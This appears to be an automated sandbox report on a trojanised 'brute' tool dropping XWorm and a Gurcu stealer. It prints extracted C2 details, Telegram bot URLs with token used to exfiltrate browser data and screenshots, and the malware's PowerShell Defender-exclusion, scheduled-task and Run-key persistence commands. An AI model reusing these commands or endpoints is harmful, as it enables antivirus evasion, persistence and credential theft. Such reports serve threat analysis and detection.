Analysis
-
max time kernel
446s -
max time network
449s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 00:38
Static task
static1
Behavioral task
behavioral1
Sample
ace_brute_v3.exe
Resource
win10v2004-20241007-en
General
-
Target
ace_brute_v3.exe
-
Size
20.7MB
-
MD5
8ce170fe4a60c76558c96e9a75fb49a7
-
SHA1
a6211291e0933b93582ae06955977a98d69e7514
-
SHA256
db3f35ead020e7aecfdba98d1e5145ced413a01984793f6d57834798dd0de0a6
-
SHA512
2ed2b6264abdac610f25361808697fbaad6e7a33f67c84db118cb932528d184f3ffb1d86fbc1487e1303d722b7cb81b46bcf37a2f0c314b054f162872a7c6a1d
-
SSDEEP
393216:TCGBLUmCO0GQQFSs3laejYsB69XmyzTvJ8cr3jALaDhZVHkURVnX72kI7OVWNp:T1BLVCOtXFVjYZ9HnW1LaZHRXXm71D
Malware Config
Extracted
xworm
5.0
find-rubber.gl.at.ply.gg:5426
CRQoPEkBWWzMBNPO
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
gurcu
https://api.telegram.org/bot7755383590:AAHvkcycZMKmP0sVjuasWVmWZcRu5CgLKA8/sendDocument?chat_id=-4507794940&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot7755383590:AAHvkcycZMKmP0sVjuasWVmWZcRu5CgLKA8/sendMessage?chat_id=-4507794940
https://api.telegram.org/bot7755383590:AAHvkcycZMKmP0sVjuasWVmWZcRu5CgLKA8/getUpdates?offset=-
https://api.telegram.org/bot7755383590:AAHvkcycZMKmP0sVjuasWVmWZcRu5CgLKA8/sendDocument?chat_id=-4507794940&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0003000000000709-45.dat family_xworm behavioral1/memory/4276-54-0x00000000001A0000-0x00000000001B2000-memory.dmp family_xworm -
Gurcu family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 3360 created 3372 3360 Update.exe 56 PID 3360 created 3372 3360 Update.exe 56 PID 3704 created 3372 3704 updater.exe 56 PID 3704 created 3372 3704 updater.exe 56 -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1848 powershell.exe 4340 powershell.exe 5040 powershell.exe 2848 powershell.exe 2920 powershell.exe 224 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation systemuser.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation ace_brute_v3.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation GoogleUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation SystemUser.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemuser.lnk GoogleUpdate.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemuser.lnk GoogleUpdate.exe -
Executes dropped EXE 9 IoCs
pid Process 4172 SystemUser.exe 4276 GoogleUpdate.exe 1496 GoogIeUpdate.exe 3360 Update.exe 1992 systemuser.exe 3704 updater.exe 3732 systemuser 3128 systemuser 640 systemuser -
Loads dropped DLL 2 IoCs
pid Process 4172 SystemUser.exe 1992 systemuser.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\systemuser = "C:\\Users\\Admin\\AppData\\Roaming\\systemuser" GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\systemuser.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 47 raw.githubusercontent.com 48 raw.githubusercontent.com 51 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 43 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2728 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3704 set thread context of 5036 3704 updater.exe 137 -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000300000000071b-65.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ace_brute_v3.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 systemuser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier systemuser.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4336 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2256 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4028 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4276 GoogleUpdate.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
pid Process 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 4172 SystemUser.exe 1848 powershell.exe 1848 powershell.exe 4340 powershell.exe 4340 powershell.exe 5040 powershell.exe 5040 powershell.exe 2848 powershell.exe 2848 powershell.exe 4276 GoogleUpdate.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 1992 systemuser.exe 3360 Update.exe 3360 Update.exe 2920 powershell.exe 2920 powershell.exe 3360 Update.exe 3360 Update.exe 3704 updater.exe 3704 updater.exe 224 powershell.exe 224 powershell.exe 3704 updater.exe 3704 updater.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4276 GoogleUpdate.exe Token: SeDebugPrivilege 4172 SystemUser.exe Token: SeDebugPrivilege 1848 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 2728 tasklist.exe Token: SeDebugPrivilege 4276 GoogleUpdate.exe Token: SeDebugPrivilege 1992 systemuser.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeIncreaseQuotaPrivilege 2920 powershell.exe Token: SeSecurityPrivilege 2920 powershell.exe Token: SeTakeOwnershipPrivilege 2920 powershell.exe Token: SeLoadDriverPrivilege 2920 powershell.exe Token: SeSystemProfilePrivilege 2920 powershell.exe Token: SeSystemtimePrivilege 2920 powershell.exe Token: SeProfSingleProcessPrivilege 2920 powershell.exe Token: SeIncBasePriorityPrivilege 2920 powershell.exe Token: SeCreatePagefilePrivilege 2920 powershell.exe Token: SeBackupPrivilege 2920 powershell.exe Token: SeRestorePrivilege 2920 powershell.exe Token: SeShutdownPrivilege 2920 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeSystemEnvironmentPrivilege 2920 powershell.exe Token: SeRemoteShutdownPrivilege 2920 powershell.exe Token: SeUndockPrivilege 2920 powershell.exe Token: SeManageVolumePrivilege 2920 powershell.exe Token: 33 2920 powershell.exe Token: 34 2920 powershell.exe Token: 35 2920 powershell.exe Token: 36 2920 powershell.exe Token: SeIncreaseQuotaPrivilege 2920 powershell.exe Token: SeSecurityPrivilege 2920 powershell.exe Token: SeTakeOwnershipPrivilege 2920 powershell.exe Token: SeLoadDriverPrivilege 2920 powershell.exe Token: SeSystemProfilePrivilege 2920 powershell.exe Token: SeSystemtimePrivilege 2920 powershell.exe Token: SeProfSingleProcessPrivilege 2920 powershell.exe Token: SeIncBasePriorityPrivilege 2920 powershell.exe Token: SeCreatePagefilePrivilege 2920 powershell.exe Token: SeBackupPrivilege 2920 powershell.exe Token: SeRestorePrivilege 2920 powershell.exe Token: SeShutdownPrivilege 2920 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeSystemEnvironmentPrivilege 2920 powershell.exe Token: SeRemoteShutdownPrivilege 2920 powershell.exe Token: SeUndockPrivilege 2920 powershell.exe Token: SeManageVolumePrivilege 2920 powershell.exe Token: 33 2920 powershell.exe Token: 34 2920 powershell.exe Token: 35 2920 powershell.exe Token: 36 2920 powershell.exe Token: SeIncreaseQuotaPrivilege 2920 powershell.exe Token: SeSecurityPrivilege 2920 powershell.exe Token: SeTakeOwnershipPrivilege 2920 powershell.exe Token: SeLoadDriverPrivilege 2920 powershell.exe Token: SeSystemProfilePrivilege 2920 powershell.exe Token: SeSystemtimePrivilege 2920 powershell.exe Token: SeProfSingleProcessPrivilege 2920 powershell.exe Token: SeIncBasePriorityPrivilege 2920 powershell.exe Token: SeCreatePagefilePrivilege 2920 powershell.exe Token: SeBackupPrivilege 2920 powershell.exe Token: SeRestorePrivilege 2920 powershell.exe Token: SeShutdownPrivilege 2920 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4276 GoogleUpdate.exe 1992 systemuser.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 4588 wrote to memory of 4172 4588 ace_brute_v3.exe 100 PID 4588 wrote to memory of 4172 4588 ace_brute_v3.exe 100 PID 4588 wrote to memory of 4276 4588 ace_brute_v3.exe 101 PID 4588 wrote to memory of 4276 4588 ace_brute_v3.exe 101 PID 4588 wrote to memory of 1496 4588 ace_brute_v3.exe 102 PID 4588 wrote to memory of 1496 4588 ace_brute_v3.exe 102 PID 4588 wrote to memory of 3360 4588 ace_brute_v3.exe 104 PID 4588 wrote to memory of 3360 4588 ace_brute_v3.exe 104 PID 4276 wrote to memory of 1848 4276 GoogleUpdate.exe 107 PID 4276 wrote to memory of 1848 4276 GoogleUpdate.exe 107 PID 4276 wrote to memory of 4340 4276 GoogleUpdate.exe 109 PID 4276 wrote to memory of 4340 4276 GoogleUpdate.exe 109 PID 4276 wrote to memory of 5040 4276 GoogleUpdate.exe 111 PID 4276 wrote to memory of 5040 4276 GoogleUpdate.exe 111 PID 4276 wrote to memory of 2848 4276 GoogleUpdate.exe 113 PID 4276 wrote to memory of 2848 4276 GoogleUpdate.exe 113 PID 4172 wrote to memory of 4796 4172 SystemUser.exe 115 PID 4172 wrote to memory of 4796 4172 SystemUser.exe 115 PID 4796 wrote to memory of 3852 4796 cmd.exe 117 PID 4796 wrote to memory of 3852 4796 cmd.exe 117 PID 4796 wrote to memory of 2728 4796 cmd.exe 118 PID 4796 wrote to memory of 2728 4796 cmd.exe 118 PID 4796 wrote to memory of 752 4796 cmd.exe 119 PID 4796 wrote to memory of 752 4796 cmd.exe 119 PID 4796 wrote to memory of 4336 4796 cmd.exe 120 PID 4796 wrote to memory of 4336 4796 cmd.exe 120 PID 4276 wrote to memory of 4028 4276 GoogleUpdate.exe 121 PID 4276 wrote to memory of 4028 4276 GoogleUpdate.exe 121 PID 4796 wrote to memory of 1992 4796 cmd.exe 123 PID 4796 wrote to memory of 1992 4796 cmd.exe 123 PID 1992 wrote to memory of 1704 1992 systemuser.exe 125 PID 1992 wrote to memory of 1704 1992 systemuser.exe 125 PID 1704 wrote to memory of 2256 1704 cmd.exe 127 PID 1704 wrote to memory of 2256 1704 cmd.exe 127 PID 3704 wrote to memory of 5036 3704 updater.exe 137 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3372
-
C:\Users\Admin\AppData\Local\Temp\ace_brute_v3.exe"C:\Users\Admin\AppData\Local\Temp\ace_brute_v3.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Users\Admin\AppData\Roaming\SystemUser.exe"C:\Users\Admin\AppData\Roaming\SystemUser.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpFF8F.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpFF8F.tmp.bat4⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:3852
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4172"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\system32\find.exefind ":"5⤵PID:752
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak5⤵
- Delays execution with timeout.exe
PID:4336
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\systemuser.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\systemuser.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\systemuser.exe /f6⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\systemuser.exe /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:2256
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\systemuser'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemuser'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "systemuser" /tr "C:\Users\Admin\AppData\Roaming\systemuser"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4028
-
-
-
C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe"C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe"3⤵
- Executes dropped EXE
PID:1496
-
-
C:\Users\Admin\AppData\Roaming\Update.exe"C:\Users\Admin\AppData\Roaming\Update.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ikwps#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ikwps#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:224
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:5036
-
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3704
-
C:\Users\Admin\AppData\Roaming\systemuserC:\Users\Admin\AppData\Roaming\systemuser1⤵
- Executes dropped EXE
PID:3732
-
C:\Users\Admin\AppData\Roaming\systemuserC:\Users\Admin\AppData\Roaming\systemuser1⤵
- Executes dropped EXE
PID:3128
-
C:\Users\Admin\AppData\Roaming\systemuserC:\Users\Admin\AppData\Roaming\systemuser1⤵
- Executes dropped EXE
PID:640
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD583c6657d5c97604293de3be7cb049812
SHA1049e9604e0dab53524bdbdb9459f6026df675468
SHA256cc0829436efefdd39837147e213e968d549f35faa2e519e0a038731e4711368a
SHA5126a814aeb121606355776d864f41dc62a311a151a33eff8593a24dc0748f86519f4f9391525d1eb3d161d3f976dda3470d5c2c2abd63d888b36c0b3822c91a9f5
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
944B
MD5a8e8360d573a4ff072dcc6f09d992c88
SHA13446774433ceaf0b400073914facab11b98b6807
SHA256bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA5124ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe
-
Filesize
944B
MD5b77a9ceea31820624963a4d9bc92c3f2
SHA19d607362dd1e73dd0118f53d10dc40ceba96de51
SHA256f6564fac403c9953410c87c206e15f5461791e939cb185fe033020f45ce7dd9f
SHA5128a6469d41c193cdd57f575942f44b9a88f5a3e529e922ba2588fd292224c636a9702f6cb32e2d3a2cd2d276bb4b6734f863d87135e8693eb6defecf70f8c9693
-
Filesize
944B
MD5100b5eb2f8c2f9a0c297ca3f2fe05082
SHA137d56cc394ec2862b7d9ad13b4742ad6154c67cb
SHA256249d526803e85f8b2ce99609e4d9b0ed463d269907a065c666c39c9cbe67c5f2
SHA512451896e4852b2319bfe967ebc9d14cb1348231fd6b002d067540c75ce1b2af91305030a9c17d92a102222cba42fb873eafd30fbb046db25b074f8a632336b852
-
Filesize
944B
MD5b3fb55704b31b597b81f1a6afaa76ab9
SHA137beddce702ba85ed0e48e770ad95af65ab5bbf8
SHA256dedfba8ad579eb654ec94b87591080211309493143cd4fd96498a94d7240e055
SHA512e2667bfea3999743c9773cad2ad2e39a32650fd9f29c3d8448a00c8e923e2100ddeebae30c694dbc63d2e08e2147f051f54de2ec5f236415fae0948d3da56dbc
-
Filesize
1KB
MD5b8e9f0518f5b43df1d5f217abbe45e52
SHA194b5d6f4128230f97b7b97d157f1ea056f9cec6e
SHA2565c835d22e9214feea62ef457a1b0eb105cb7cb6cceee8b77c519e071ef33027d
SHA512ef489c7bce704726fb82a1ccfbd99be283a33b94139c0a7c32d71bdc72b1325191507dc5536dbb9c0d2fb00b12c159a26f1d54f2597d251646f5273dec9c357e
-
Filesize
1.7MB
MD533d6f24d7a3785414e43930817a56f1e
SHA1fec3226f647a0d18088ddbe1978e6427308a4d4b
SHA256cae798b066200203ab6358ed955c903dbfe82a797c36b562f902e647d331bedc
SHA5129fd1a6d50fcafdd6210dac28ba8f0a7e0bb3bfd3b8cdf6487a9f11d3dcdb4a8abe98e025f9622f414eb7d7a183cc417cd21f6d472f06f98b9c7817293a9231ae
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
290B
MD5414a37325f0a86b14dbe39d0b4ace251
SHA161f3edaf9fccf24d33e0e225b4c1a4ac491e3633
SHA256fa33434bfad4d886cc867eb1540ca02c3a16323ec8cbfee87c9f8ef0d27ed4ec
SHA512833d75b85e2c206e294fa548dd38b01cd2b876518d79c9cdc8a0f721ffd23451eae6d1d8f13d6fc3b0ece6ed3d6b8127efcec2c14e2d53e4a281b4d3a45ca1f0
-
Filesize
10.5MB
MD588c0ba254398252dcb396a20c81e7da3
SHA1ddf8f608280a9f55784e1ff0fbaa3aa37d5a62ad
SHA256f0eac33ce94dbeb977a355f19e973923a2a59de74f6bf6241f5f54bad55b8056
SHA512a53dcb144cba7f565120634b4d9789afb657e88c04c75f6456a70387a715ddc7b61866ce2452d7c825ac2a0080ee004f07b73fb32baf4024aa8c4a8942cf7f3e
-
Filesize
44KB
MD541f377b6179872f56267c7ecc450e068
SHA1b3b31cae1c58ccb02f28c08d61c9713369d7b29f
SHA25698e4a37dd2372325463f2db56d8a0963e068227df7c33f70029462e147f2cf85
SHA5122182d76b3171553240af41238549f9dcb59f30f08eef77547358d06433431858423d9a626975137a8db65d9437711709a939648154ea49f0002ffb88f997067b
-
Filesize
5.6MB
MD5387d8a7b3fda30a837d7dfa731b1750c
SHA1443aba8c81152692821679d733816bcc7af51a54
SHA256a30e776ed5a85ffdac3c5e8f05b0537d581fff5626d957d0bdecd46c00150730
SHA512fe3157fad70dba30754bf92ed2324e1aa918f0face15847b37333d8368d96e5b9ba0194c9cf807a64eaee042b7b7ac5e4ad13fc7b8f36091c2d80171724dbdaa
-
Filesize
4.5MB
MD5a9e90f931958d7320f9071b003bf8753
SHA1075e7917c79c0a00ed58348680c7740c751e6cb8
SHA2561e52c25fbce5e1e94a2f1c4e78f1a6b740be84095d747edea1f301381e98aed9
SHA51299deebb9ef3e27d5b9cf07c629934b1946977aebdc3374aab5e863db18d59b6788bfd223731304d04d4d2c6ce804c6b393ef7b0410560b9425bbd82f4cc2f1e1